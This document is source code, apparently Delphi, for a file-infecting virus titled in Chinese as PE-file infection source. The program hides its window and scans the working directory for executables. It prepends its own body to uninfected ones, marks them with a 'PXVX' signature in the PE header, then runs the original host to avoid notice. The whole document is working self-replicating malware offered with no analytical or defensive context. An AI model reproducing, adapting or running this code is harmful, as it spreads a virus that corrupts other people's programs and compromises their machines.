感染PE文件源码

program XX；{$APPTYPE CONSOLE}usesSysUtils,Windows,ShellApi,TlHelp32;//-----------------------DETERMINE PROCESS EXISTANCE-----------------------------function process_exists(exeFileName: string): Boolean;varContinueLoop: BOOL;FSnapshotHandle: THandle;FProcessEntry32: TProcessEntry32;beginFSnapshotHandle := CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);FProcessEntry32.dwSize := SizeOf(FProcessEntry32);ContinueLoop := Process32First(FSnapshotHandle, FProcessEntry32);Result := False;while Integer(ContinueLoop) <> 0 dobegin if ((UpperCase(ExtractFileName(FProcessEntry32.szExeFile)) = UpperCase(ExeFileName)) or (UpperCase(FProcessEntry32.szExeFile) = UpperCase(ExeFileName))) then begin Result := True; end; ContinueLoop := Process32Next(FSnapshotHandle, FProcessEntry32);end;CloseHandle(FSnapshotHandle);end;//-----------------------CHECK FILE FOR INFECTION------------------------function check_infected(hndl:string;size:longint):boolean;var i,PE_Header:longint; hndl2,NBR:dword; buf:array[1..2] of char; sign:array[1..4] of char;beginhndl2:=CreateFile(pchar(hndl),GENERIC_READ,FILE_SHARE_READ or FILE_SHARE_WRITE,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);i:=0; PE_Header:=0;repeati:=i+1;ReadFile(hndl2,buf,SizeOf(buf),NBR,0);if buf='PE' then PE_Header:=i;until (i=size) or (PE_Header<>0);SetFilePointer(hndl2,PE_Header+$4C,0,FILE_BEGIN);ReadFile(hndl2,sign,SizeOf(sign),NBR,0);if sign='PXVX' then check_infected:=TRUEelse check_infected:=FALSE;CloseHandle(hndl2);end;//--------------------WRITE VIRUS SIGN----------------------------------------------procedure write_sign(hndl:string;size:longint);var i,PE_Header:longint; hndl2,NBR:dword; buf:array[1..2] of char; sign:array[1..4] of char;beginsign[1]:='P'; sign[2]:='X'; sign[3]:='V'; sign[4]:='X';i:=0; PE_Header:=0;hndl2:=CreateFile(pchar(hndl),GENERIC_READ,FILE_SHARE_READ or FILE_SHARE_WRITE,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);repeati:=i+1;ReadFile(hndl2,buf,SizeOf(buf),NBR,0);if buf='PE' then PE_Header:=i;until (i=size) or (PE_HEADER<>0);CloseHandle(hndl2);hndl2:=CreateFile(pchar(hndl),GENERIC_WRITE,FILE_SHARE_READ or FILE_SHARE_WRITE,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);SetFilePointer(hndl2,PE_Header+$4C,0,FILE_BEGIN);WriteFile(hndl2,sign,SizeOf(sign),NBR,0);CloseHandle(hndl2);end;//--------------------EXECUTE HOST FILE-----------------------------------------procedure exec_host(hndl:string);beginShellExecute(0,'open',pchar(hndl),nil,nil,SW_SHOWNORMAL);repeatsleep(1000);until process_exists(hndl)=FALSE;end;//---------------------LOAD VIRUS---------------------------------------------procedure load_virus(hndl:string;virus_size:longint);var buf:char; i:integer; vir_hndl,tmp_hndl,NBR:dword;begintmp_hndl:=CreateFile(pchar('virus.dat'),GENERIC_READ or GENERIC_WRITE,FILE_SHARE_READ or FILE_SHARE_WRITE,0,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0);vir_hndl:=CreateFile(pchar(hndl),GENERIC_READ,FILE_SHARE_READ or FILE_SHARE_WRITE,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);for i:=1 to virus_size do beginReadFile(vir_hndl,buf,SizeOf(buf),NBR,0);WriteFile(tmp_hndl,buf,SizeOf(buf),NBR,0);end;CloseHandle(vir_hndl);CloseHandle(tmp_hndl);end;//---------------------LOAD HOST----------------------------------------------procedure load_host(hndl:string;virus_size,host_size:longint);var i:integer; buf:char; vir_hndl,tmp_hndl,NBR:dword;begintmp_hndl:=CreateFile(pchar('host.exe'),GENERIC_READ or GENERIC_WRITE,FILE_SHARE_READ or FILE_SHARE_WRITE,0,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0);vir_hndl:=CreateFile(pchar(hndl),GENERIC_READ,FILE_SHARE_READ or FILE_SHARE_WRITE,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);SetFilePointer(vir_hndl,virus_size,0,FILE_BEGIN);for i:=1 to host_size do beginReadFile(vir_hndl,buf,SizeOf(buf),NBR,0);WriteFile(tmp_hndl,buf,SizeOf(buf),NBR,0);end;CloseHandle(vir_hndl);CloseHandle(tmp_hndl);end;//--------------------------PREPEND---------------------------------------------procedure prepend(victim,virus:string;virus_size,victim_size:longint);var buf:char; i:integer; vir_hndl,vic_hndl,NBR,target_hndl:dword;beginvir_hndl:=CreateFile(pchar(virus),GENERIC_READ or GENERIC_WRITE,FILE_SHARE_READ or FILE_SHARE_WRITE,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);target_hndl:=CreateFile(pchar(victim),GENERIC_READ or GENERIC_WRITE,FILE_SHARE_READ or FILE_SHARE_WRITE,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);vic_hndl:=CreateFile(pchar('victim.dat'),GENERIC_READ or GENERIC_WRITE,FILE_SHARE_READ or FILE_SHARE_WRITE,0,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0);for i:=1 to victim_size do beginReadFile(target_hndl,buf,SizeOf(buf),NBR,0);WriteFile(vic_hndl,buf,SizeOf(buf),NBR,0);end;CloseHandle(vic_hndl);CloseHandle(target_hndl);target_hndl:=CreateFile(pchar(victim),GENERIC_READ or GENERIC_WRITE,FILE_SHARE_READ or FILE_SHARE_WRITE,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);vic_hndl:=CreateFile(pchar('victim.dat'),GENERIC_READ or GENERIC_WRITE,FILE_SHARE_READ or FILE_SHARE_WRITE,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);for i:=1 to virus_size do beginReadFile(vir_hndl,buf,SizeOf(buf),NBR,0);WriteFile(target_hndl,buf,SizeOf(buf),NBR,0);end;CloseHandle(vir_hndl);for i:=1 to victim_size do beginReadFile(vic_hndl,buf,SizeOf(buf),NBR,0);WriteFile(target_hndl,buf,SizeOf(buf),NBR,0);end;CloseHandle(vic_hndl);SetEndOfFile(target_hndl);CloseHandle(target_hndl);end;//------------------------DELETE TMP FILES--------------------------------procedure delete_junk;beginDeleteFile(pchar('host.exe'));DeleteFile(pchar('virus.dat'));DeleteFile(pchar('victim.dat'));end;//--------------------------MAIN VIRUS--------------------------------------const virus_size=44544;var over,exec_flag:boolean; host_size:longint; n:dword; old:string; FileSize:LongWord; target,sr:tsearchrec; Inf_counter:integer;beginShowWindow(FindWindow(nil,pchar(paramstr(0))),SW_HIDE);Inf_counter:=2; over:=FALSE;n:=FindFirst(paramstr(0),faAnyFile,sr);FileSize:=sr.size;FindClose(n);exec_flag:=TRUE;host_size:=FileSize-virus_size;FindFirst('*.exe',faAnyFile,target);if target.name=ExtractFilename(paramstr(0)) then FindNext(target);repeatif (target.name<>ExtractfileName(paramstr(0))) and (check_infected(target.name,target.size)=FALSE) and (target.name<>'host.exe') thenbeginif virus_size<>FileSize then beginhost_size:=FileSize-virus_size;load_virus(paramstr(0),virus_size);if exec_flag=TRUE then beginload_host(paramstr(0),virus_size,host_size);exec_host('host.exe');end;exec_flag:=FALSE;prepend(target.name,'virus.dat',virus_size,target.size);Inf_counter:=Inf_counter-1;endelse beginload_virus(paramstr(0),virus_size);prepend(target.name,'virus.dat',virus_size,target.size);write_sign(target.name,target.size);Inf_counter:=Inf_counter-1;exec_flag:=FALSE;endend;old:=target.name;FindNext(target);if target.name=old then over:=TRUE;until (Inf_counter=0) or (over=TRUE);if (virus_size<>FileSize) and (exec_flag=TRUE) then beginload_host(paramstr(0),virus_size,host_size);exec_host('host.exe');end;delete_junk;ExitProcess(0);end.